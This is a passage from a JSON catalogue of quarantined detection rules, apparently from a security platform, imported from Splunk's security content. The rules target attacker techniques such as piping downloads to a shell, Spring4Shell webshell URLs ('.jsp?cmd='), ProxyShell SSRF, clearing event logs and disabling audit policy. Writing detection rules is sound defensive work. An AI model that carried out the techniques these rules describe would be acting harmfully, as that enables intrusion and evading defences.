If confirmed malicious, this activity could allow an attacker to map out Azure Active Directory structures, aiding in further attacks and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-azurehound-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "26f02e96-c300-11eb-b611-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_azurehound_command_line_arguments.yml" } }, { "id": "splunk-security-content-26f86252-1549-45e1-a212-eb26840e86bc", "type": "detection", "name": "File Download or Read to Pipe Execution", "description": "The following analytic detects the use of download or file reading utilities from Windows, Linux or MacOS to download or read the contents of a file from a remote or local source and pipe it directly to a shell for execution.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions.\nThis activity is significant as it is commonly associated with malicious actions like coinminers and exploits such as CVE-2021-44228 in Log4j.\nIf confirmed malicious, this behavior could allow attackers to execute arbitrary code, potentially leading to system compromise and unauthorized access to sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/file-download-or-read-to-pipe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "26f86252-1549-45e1-a212-eb26840e86bc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/file_download_or_read_to_pipe_execution.yml" } }, { "id": "splunk-security-content-27187e0e-c221-471d-a7bd-04f698985ff6", "type": "detection", "name": "Windows Snake Malware File Modification Crmlog", "description": "The following analytic identifies the creation of a .crmlog file within the %windows%\\Registration directory, typically with a format of ..crmlog. This detection leverages the Endpoint.Filesystem datamodel to monitor file creation events in the specified directory. This activity is significant as it is associated with the Snake malware, which uses this file for its operations. If confirmed malicious, this could indicate the presence of Snake malware, leading to potential data exfiltration, system compromise, and further malicious activities. 
Immediate investigation is required to mitigate the threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-snake-malware-file-modification-crmlog.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27187e0e-c221-471d-a7bd-04f698985ff6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_snake_malware_file_modification_crmlog.yml" } }, { "id": "splunk-security-content-272b8407-842d-4b3d-bead-a704584003d3", "type": "detection", "name": "Remote Desktop Network Traffic", "description": "The following analytic detects unusual Remote Desktop Protocol (RDP) traffic on TCP/3389 by filtering out known RDP sources and destinations, focusing on atypical connections within the network. This detection leverages network traffic data to identify potentially unauthorized RDP access. Monitoring this activity is crucial for a SOC as unauthorized RDP access can indicate an attacker's attempt to control networked systems, leading to data theft, ransomware deployment, or further network compromise. 
If confirmed malicious, this activity could result in significant data breaches or complete system and network control loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-desktop-network-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "272b8407-842d-4b3d-bead-a704584003d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/remote_desktop_network_traffic.yml" } }, { "id": "splunk-security-content-272df6de-61f1-4784-877c-1fbc3e2d0838", "type": "detection", "name": "Remote WMI Command Attempt", "description": "The following analytic detects the execution of `wmic.exe` with the `node` switch, indicating an attempt to spawn a local or remote process. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line arguments. This activity is significant as it may indicate lateral movement or remote code execution attempts by an attacker. 
If confirmed malicious, the attacker could gain remote control over the targeted system, execute arbitrary commands, and potentially escalate privileges or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-wmi-command-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "272df6de-61f1-4784-877c-1fbc3e2d0838", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_wmi_command_attempt.yml" } }, { "id": "splunk-security-content-27914692-9c62-44ea-9129-ceb429b61bd0", "type": "detection", "name": "Windows Audit Policy Auditing Option Modified - Registry", "description": "The following analytic detects potentially suspicious modifications to the Audit Policy auditing options registry values. It leverages data from the Endpoint.Registry data model, focusing on changes to one of the following auditing option values \"CrashOnAuditFail\", \"FullPrivilegeAuditing\", \"AuditBaseObjects\" and \"AuditBaseDirectories\" within the \"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\\" registry key. This activity is significant as it could be a sign of a threat actor trying to tamper with the audit policy configuration and disable the SACL configuration. 
If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-audit-policy-auditing-option-modified-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27914692-9c62-44ea-9129-ceb429b61bd0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_audit_policy_auditing_option_modified___registry.yml" } }, { "id": "splunk-security-content-27958de0-2857-43ca-9d4c-b255cf59dcab", "type": "detection", "name": "Windows PowerShell Disable HTTP Logging", "description": "The following analytic detects the use of `get-WebConfigurationProperty` and `Set-ItemProperty` commands in PowerShell to disable HTTP logging on Windows systems. This detection leverages PowerShell Script Block Logging, specifically looking for script blocks that reference HTTP logging properties and attempt to set them to \"false\" or \"dontLog\". Disabling HTTP logging is significant as it can be used by adversaries to cover their tracks and delete logs, hindering forensic investigations. 
If confirmed malicious, this activity could allow attackers to evade detection and persist in the environment undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004", "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-disable-http-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27958de0-2857-43ca-9d4c-b255cf59dcab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_disable_http_logging.yml" } }, { "id": "splunk-security-content-27ab61c5-f08a-438a-b4d3-325e666490b3", "type": "detection", "name": "O365 Mailbox Read Access Granted to Application", "description": "The following analytic identifies instances where the Mail.Read Graph API permissions are granted to an application registration within an Office 365 tenant. It leverages O365 audit logs, specifically events related to changes in application permissions within the AzureActiveDirectory workload. This activity is significant because the Mail.Read permission allows applications to access and read all emails within a user's mailbox, which often contain sensitive or confidential information. 
If confirmed malicious, this could lead to data exfiltration, spear-phishing attacks, or further compromise based on the information gathered from the emails.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003", "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-mailbox-read-access-granted-to-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27ab61c5-f08a-438a-b4d3-325e666490b3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_mailbox_read_access_granted_to_application.yml" } }, { "id": "splunk-security-content-27c3a83d-cada-47c6-9042-67baf19d2574", "type": "detection", "name": "Detect PsExec With accepteula Flag", "description": "The following analytic identifies the execution of `PsExec.exe` with the `accepteula` flag in the command line. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant because PsExec is commonly used by threat actors to execute code on remote systems, and the `accepteula` flag indicates first-time usage, which could signify initial compromise. 
If confirmed malicious, this activity could allow attackers to gain remote code execution capabilities, potentially leading to further system compromise and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-psexec-with-accepteula-flag.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27c3a83d-cada-47c6-9042-67baf19d2574", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_psexec_with_accepteula_flag.yml" } }, { "id": "splunk-security-content-27e600aa-77f8-4614-bc80-2662a67e2f48", "type": "detection", "name": "Windows DnsAdmins New Member Added", "description": "The following analytic detects the addition of a new member to the DnsAdmins group in Active Directory by leveraging Event ID 4732. This detection uses security event logs to identify changes to this high-privilege group. Monitoring this activity is crucial because members of the DnsAdmins group can manage the DNS service, often running on Domain Controllers, and potentially execute malicious code with SYSTEM privileges. 
If confirmed malicious, this activity could allow an attacker to escalate privileges and gain control over critical domain services, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dnsadmins-new-member-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27e600aa-77f8-4614-bc80-2662a67e2f48", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dnsadmins_new_member_added.yml" } }, { "id": "splunk-security-content-27ed3e79-6d86-44dd-b9ab-524451c97a7b", "type": "detection", "name": "Windows Modify Registry Disable Windows Security Center Notif", "description": "The following analytic detects modifications to the Windows registry aimed at disabling Windows Security Center notifications. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the registry path \"*\\\\Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience*\" with a value of \"0x00000000\". This activity is significant as it can indicate an attempt by adversaries or malware, such as Azorult, to evade defenses by suppressing critical update notifications. 
If confirmed malicious, this could allow attackers to persist undetected, potentially leading to further exploitation and compromise of the host system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disable-windows-security-center-notif.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "27ed3e79-6d86-44dd-b9ab-524451c97a7b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disable_windows_security_center_notif.yml" } }, { "id": "splunk-security-content-28077620-c9f6-11eb-8785-acde48001122", "type": "detection", "name": "Recon AVProduct Through Pwh or WMI", "description": "The following analytic detects suspicious PowerShell script execution via EventCode 4104, specifically targeting checks for installed anti-virus products using WMI or PowerShell commands. This detection leverages PowerShell Script Block Logging to identify scripts containing keywords like \"SELECT,\" \"WMIC,\" \"AntiVirusProduct,\" or \"AntiSpywareProduct.\" This activity is significant as it is commonly used by malware and APT actors to map running security applications or services, potentially aiding in evasion techniques. 
If confirmed malicious, this could allow attackers to disable or bypass security measures, leading to further compromise of the endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/recon-avproduct-through-pwh-or-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "28077620-c9f6-11eb-8785-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/recon_avproduct_through_pwh_or_wmi.yml" } }, { "id": "splunk-security-content-2820f032-19eb-497e-8642-25b04a880359", "type": "detection", "name": "LOLBAS With Network Traffic", "description": "The following analytic identifies the use of Living Off the Land Binaries and Scripts (LOLBAS) with network traffic. It leverages data from the Network Traffic data model to detect when native Windows binaries, often abused by adversaries, initiate network connections. This activity is significant as LOLBAS are frequently used to download malicious payloads, enabling lateral movement, command-and-control, or data exfiltration. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a severe threat to organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1567", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/lolbas-with-network-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2820f032-19eb-497e-8642-25b04a880359", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/lolbas_with_network_traffic.yml" } }, { "id": "splunk-security-content-2827c0fd-e1be-4868-ae25-59d28e0f9d4f", "type": "detection", "name": "Suspicious wevtutil Usage", "description": "The following analytic detects the usage of wevtutil.exe with parameters for clearing event logs such as Application, Security, Setup, Trace, or System. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant because clearing event logs can be an attempt to cover tracks after malicious actions, hindering forensic investigations. 
If confirmed malicious, this behavior could allow an attacker to erase evidence of their activities, making it difficult to trace their actions and understand the full scope of the compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-wevtutil-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2827c0fd-e1be-4868-ae25-59d28e0f9d4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_wevtutil_usage.yml" } }, { "id": "splunk-security-content-2846089a-ffe9-4881-a2a2-43f3be2b8cc7", "type": "detection", "name": "Windows Chrome Extension Allowed Registry Modification", "description": "The following analytic detects modifications to the Windows registry keys that control the Chrome Extension Install Allowlist. Unauthorized changes to these keys may indicate attempts to bypass Chrome extension restrictions or install unapproved extensions. 
This detection helps identify potential security policy violations or malicious activity targeting Chrome extension settings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1185" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chrome-extension-allowed-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2846089a-ffe9-4881-a2a2-43f3be2b8cc7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chrome_extension_allowed_registry_modification.yml" } }, { "id": "splunk-security-content-2850c734-2d44-4431-8139-1a56f6f54c01", "type": "detection", "name": "Web JSP Request via URL", "description": "The following analytic identifies URL requests associated with CVE-2022-22965 (Spring4Shell) exploitation attempts, specifically targeting webshell access on a remote webserver. It detects HTTP GET requests with URLs containing \".jsp?cmd=\" or \"j&cmd=\" patterns. This activity is significant as it indicates potential webshell deployment, which can lead to unauthorized remote command execution. 
If confirmed malicious, attackers could gain control over the webserver, execute arbitrary commands, and potentially escalate privileges, leading to severe data breaches and system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/web-jsp-request-via-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2850c734-2d44-4431-8139-1a56f6f54c01", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/web_jsp_request_via_url.yml" } }, { "id": "splunk-security-content-289ad59f-8939-4331-b805-f2bd51d36fb8", "type": "detection", "name": "Zscaler Behavior Analysis Threat Blocked", "description": "The following analytic identifies threats blocked by the Zscaler proxy based on behavior analysis. It leverages web proxy logs to detect entries where actions are blocked and threat names and classes are specified. This detection is significant as it highlights potential malicious activities that were intercepted by Zscaler's behavior analysis, providing early indicators of threats. 
If confirmed malicious, these blocked threats could indicate attempted breaches or malware infections, helping security teams to understand and mitigate potential risks in their environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-behavior-analysis-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "289ad59f-8939-4331-b805-f2bd51d36fb8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_behavior_analysis_threat_blocked.yml" } }, { "id": "splunk-security-content-289ed0a1-4c78-4a43-9321-44ea2e089c14", "type": "detection", "name": "O365 New Forwarding Mailflow Rule Created", "description": "The following analytic detects the creation of new mail flow rules in Office 365 that may redirect or copy emails to unauthorized or external addresses. It leverages Office 365 Management Activity logs, specifically querying for the \"New-TransportRule\" operation and parameters like \"BlindCopyTo\", \"CopyTo\", and \"RedirectMessageTo\". This activity is significant as it can indicate potential data exfiltration or unauthorized access to sensitive information. 
If confirmed malicious, attackers could intercept or redirect email communications, leading to data breaches or information leakage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-new-forwarding-mailflow-rule-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "289ed0a1-4c78-4a43-9321-44ea2e089c14", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_new_forwarding_mailflow_rule_created.yml" } }, { "id": "splunk-security-content-28b80028-851d-4b8d-88a5-375ba115418a", "type": "detection", "name": "Windows Remote Management Execute Shell", "description": "The following analytic detects the execution of winrshost.exe initiating CMD or PowerShell processes as part of a potential payload execution. winrshost.exe is associated with Windows Remote Management (WinRM) and is typically used for remote execution. By monitoring for this behavior, the detection identifies instances where winrshost.exe is leveraged to run potentially malicious commands or payloads via CMD or PowerShell. 
This behavior may indicate exploitation of remote management tools for unauthorized access or lateral movement within a compromised environment, signaling a potential security incident.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-management-execute-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "28b80028-851d-4b8d-88a5-375ba115418a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_management_execute_shell.yml" } }, { "id": "splunk-security-content-28e06670-43df-11ec-a569-acde48001122", "type": "detection", "name": "Windows InstallUtil URL in Command Line", "description": "The following analytic detects the use of Windows InstallUtil.exe with an HTTP or HTTPS URL in the command line. This is identified through Endpoint Detection and Response (EDR) telemetry, focusing on command-line executions containing URLs. This activity is significant as it may indicate an attempt to download and execute malicious code, potentially bypassing application control mechanisms. If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, or persistent access within the environment. 
Analysts should review the parent process, network connections, file modifications, and related processes for further investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-installutil-url-in-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "28e06670-43df-11ec-a569-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_installutil_url_in_command_line.yml" } }, { "id": "splunk-security-content-29228ab4-0762-11ec-94aa-acde48001122", "type": "detection", "name": "Exchange PowerShell Abuse via SSRF", "description": "The following analytic detects suspicious behavior indicative of ProxyShell exploitation against on-premise Microsoft Exchange servers. It identifies HTTP POST requests to `autodiscover.json` containing `PowerShell` in the URI, leveraging server-side request forgery (SSRF) to access backend PowerShell. This detection uses Exchange server logs ingested into Splunk. Monitoring this activity is crucial as it may indicate an attacker attempting to execute commands or scripts on the Exchange server. 
If confirmed malicious, this could lead to unauthorized access, privilege escalation, or persistent control over the Exchange environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/exchange-powershell-abuse-via-ssrf.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "29228ab4-0762-11ec-94aa-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/exchange_powershell_abuse_via_ssrf.yml" } }, { "id": "splunk-security-content-294c4686-63dd-4fe6-93a2-ca807626704a", "type": "detection", "name": "Amazon EKS Kubernetes cluster scan detection", "description": "The following analytic detects unauthenticated requests to an Amazon EKS Kubernetes cluster, specifically identifying actions by the \"system:anonymous\" user. It leverages AWS CloudWatch Logs data, focusing on user agents and authentication details. This activity is significant as it may indicate unauthorized scanning or probing of the Kubernetes cluster, which could be a precursor to an attack. 
If confirmed malicious, this could lead to unauthorized access, data exfiltration, or disruption of services within the Kubernetes environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/amazon-eks-kubernetes-cluster-scan-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "294c4686-63dd-4fe6-93a2-ca807626704a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/amazon_eks_kubernetes_cluster_scan_detection.yml" } }, { "id": "splunk-security-content-295ca9ed-e97b-4520-90f7-dfb6469902e1", "type": "detection", "name": "Windows DLL Side-Loading Process Child Of Calc", "description": "The following analytic identifies suspicious child processes spawned by calc.exe, indicative of a potential DLL side-loading technique. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process GUIDs, names, and parent processes. In previous versions of the \"calc.exe\" binary, namely on Windows 7, it was vulnerable to DLL side-loading, where an attacker is able to load an arbitrary DLL named \"WindowsCodecs.dll\". This activity was observed in Qakbot malware, back in 2022. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, maintain persistence, and escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dll-side-loading-process-child-of-calc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "295ca9ed-e97b-4520-90f7-dfb6469902e1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dll_side_loading_process_child_of_calc.yml" } }, { "id": "splunk-security-content-29af1725-7a72-4d2d-8a18-e697e79a62d3", "type": "detection", "name": "O365 External Identity Policy Changed", "description": "The following analytic identifies when changes are made to the external guest policies within Azure AD. With Azure AD B2B collaboration, users and administrators can invite external users to collaborate with internal users. This detection also attempts to highlight what may have changed. External guest account invitations should be monitored by security teams as they could potentially lead to unauthorized access. 
An example of this attack vector was described at BlackHat 2022 by security researcher Dirk-Jan during his talk `Backdooring and Hijacking Azure AD Accounts by Abusing External Identities`.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-external-identity-policy-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "29af1725-7a72-4d2d-8a18-e697e79a62d3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_external_identity_policy_changed.yml" } }, { "id": "splunk-security-content-29b99201-723c-4118-847a-db2b3d3fb8ea", "type": "detection", "name": "GetWmiObject Ds Computer with PowerShell Script Block", "description": "The following analytic detects the execution of the 